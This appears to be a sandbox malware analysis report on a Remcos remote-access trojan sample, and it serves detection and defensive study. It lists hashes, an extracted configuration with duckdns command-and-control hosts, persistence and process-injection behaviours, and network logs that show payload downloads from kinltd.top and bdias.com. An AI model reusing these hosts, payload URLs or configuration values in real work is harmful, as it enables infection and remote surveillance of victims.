remcos | af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/11/2024, 08:22 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
Size

950KB
MD5

47dc282aac61a2d84456239a1b98323b
SHA1

fa355c5f51424e36fdacc15efbd733b2b4b74273
SHA256

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef
SHA512

1e6fe2daad9baa61dfcb5b2cfe0c3b923d5e6ead3706e17a1ee5175615e6469a8fddbbc0e5026d7bff13757d4de79f4c655416f2034046194b728558de53087f
SSDEEP

24576:jSkd+Dv8sV5MuxyCaOW7yTN9goUIxCZm74qLL:G5D8OhaOW7yTQqCZm74mL

Score

10^/10

remcos reborn discovery persistence rat

Malware Config

Extracted

Family

remcos

Botnet

ReBorn

gerfourt99lahjou2.duckdns.org:3487

gerfourt99lahjou2.duckdns.org:3488

gerfourt99lahjou3.duckdns.org:3487

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
ksaourts.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
ksajoutr-WG0CPT
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Loads dropped DLL 2 IoCs

pid	Process
1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key = "C:\\Users\\Admin\\AppData\\Local\\Temp\\subfolder1\\Achroite.exe"	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\genbrugsflaske\tidsglose.ini	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
400	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
400	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1172 set thread context of 400	1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe	99

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Catallactic.sep	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
File opened for modification	C:\Windows\resources\concento\Vedkend.Sei205	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
400	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 1172 wrote to memory of 400	1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe	99
PID 1172 wrote to memory of 400	1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe	99
PID 1172 wrote to memory of 400	1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe	99
PID 1172 wrote to memory of 400	1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe	99
PID 1172 wrote to memory of 400	1172	af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe	99

C:\Users\Admin\AppData\Local\Temp\af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
"C:\Users\Admin\AppData\Local\Temp\af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Users\Admin\AppData\Local\Temp\af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe
  "C:\Users\Admin\AppData\Local\Temp\af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:400

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

71.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR
DNS

kinltd.top

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

kinltd.top

IN A

Response

kinltd.top

IN A

172.67.216.75

kinltd.top

IN A

104.21.24.17
GET

http://kinltd.top/KAxnVVwaQV3.bin

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

172.67.216.75:80

Request

GET /KAxnVVwaQV3.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: kinltd.top
Cache-Control: no-cache

Response

HTTP/1.1 403 Forbidden

Date: Thu, 14 Nov 2024 08:23:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cs16kNHmcasPaoFnnWJ8AKqB86618SRkUgEI8fUFYvMlNkRIidlCf%2FnnjGOyxBfIkz16mHSkNxQC04JkOMsVhASnUYvO2MuoJN2vkGIfZ88PoMsoXOWiXzV%2FzdTS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8e2599f7de6f76fc-LHR
alt-svc: h2=":443"; ma=60
DNS

75.216.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.216.67.172.in-addr.arpa

IN PTR

Response
DNS

bdias.com

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

bdias.com

IN A

Response

bdias.com

IN A

91.196.125.125
GET

http://bdias.com/KAxnVVwaQV3.bin

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

91.196.125.125:80

Request

GET /KAxnVVwaQV3.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: bdias.com
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Thu, 14 Nov 2024 08:23:57 GMT
Server: Apache
Location: https://bdias.com/KAxnVVwaQV3.bin
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
GET

https://bdias.com/KAxnVVwaQV3.bin

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

91.196.125.125:443

Request

GET /KAxnVVwaQV3.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: bdias.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 14 Nov 2024 08:23:57 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Fri, 08 Nov 2024 09:09:18 GMT
ETag: "bb404f2-78640-626631b19d747"
Accept-Ranges: bytes
Content-Length: 493120
Keep-Alive: timeout=5, max=100
Content-Type: application/octet-stream
DNS

r10.o.lencr.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

r10.o.lencr.org

IN A

Response

r10.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

104.91.71.89

a1887.dscq.akamai.net

IN A

104.91.71.90
GET

http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRTxReDSpmuJAOJOYAXkyopQA%3D%3D

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

104.91.71.89:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRTxReDSpmuJAOJOYAXkyopQA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r10.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "8AB81BA3F850FCC5DC5AFAF4DE67877DA7E65FBACEA7E1AA5C2322289E82A19F"
Last-Modified: Wed, 13 Nov 2024 20:06:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=17131
Expires: Thu, 14 Nov 2024 13:09:28 GMT
Date: Thu, 14 Nov 2024 08:23:57 GMT
Connection: keep-alive
DNS

125.125.196.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

125.125.196.91.in-addr.arpa

IN PTR

Response

125.125.196.91.in-addr.arpa

IN PTR

host125-125superhostingbg
DNS

40.13.222.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.13.222.173.in-addr.arpa

IN PTR

Response

40.13.222.173.in-addr.arpa

IN PTR

a173-222-13-40deploystaticakamaitechnologiescom
DNS

89.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.71.91.104.in-addr.arpa

IN PTR

Response

89.71.91.104.in-addr.arpa

IN PTR

a104-91-71-89deploystaticakamaitechnologiescom
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response

gerfourt99lahjou2.duckdns.org

IN A

192.169.69.26
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response

gerfourt99lahjou2.duckdns.org

IN A

192.169.69.26
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

26.69.169.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.69.169.192.in-addr.arpa

IN PTR

Response

26.69.169.192.in-addr.arpa

IN PTR

sinkholehyascom
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A

Response
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A
DNS

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou2.duckdns.org

IN A
DNS

gerfourt99lahjou3.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

Remote address:

8.8.8.8:53

Request

gerfourt99lahjou3.duckdns.org

IN A

Response

172.67.216.75:80

http://kinltd.top/KAxnVVwaQV3.bin

http

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

538 B
5.4kB
8
7

HTTP Request

GET http://kinltd.top/KAxnVVwaQV3.bin

HTTP Response

403
91.196.125.125:80

http://bdias.com/KAxnVVwaQV3.bin

http

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

399 B
611 B
5
4

HTTP Request

GET http://bdias.com/KAxnVVwaQV3.bin

HTTP Response

301
91.196.125.125:443

https://bdias.com/KAxnVVwaQV3.bin

tls, http

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

18.4kB
513.6kB
376
373

HTTP Request

GET https://bdias.com/KAxnVVwaQV3.bin

HTTP Response

200
104.91.71.89:80

http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRTxReDSpmuJAOJOYAXkyopQA%3D%3D

http

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

424 B
1.0kB
4
3

HTTP Request

GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRTxReDSpmuJAOJOYAXkyopQA%3D%3D

HTTP Response

200
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2
192.169.69.26:3487

gerfourt99lahjou2.duckdns.org

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

973 B
88 B
3
2
192.169.69.26:3488

gerfourt99lahjou2.duckdns.org

tls

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

304 B
88 B
3
2

8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

71.31.126.40.in-addr.arpa

dns

71 B
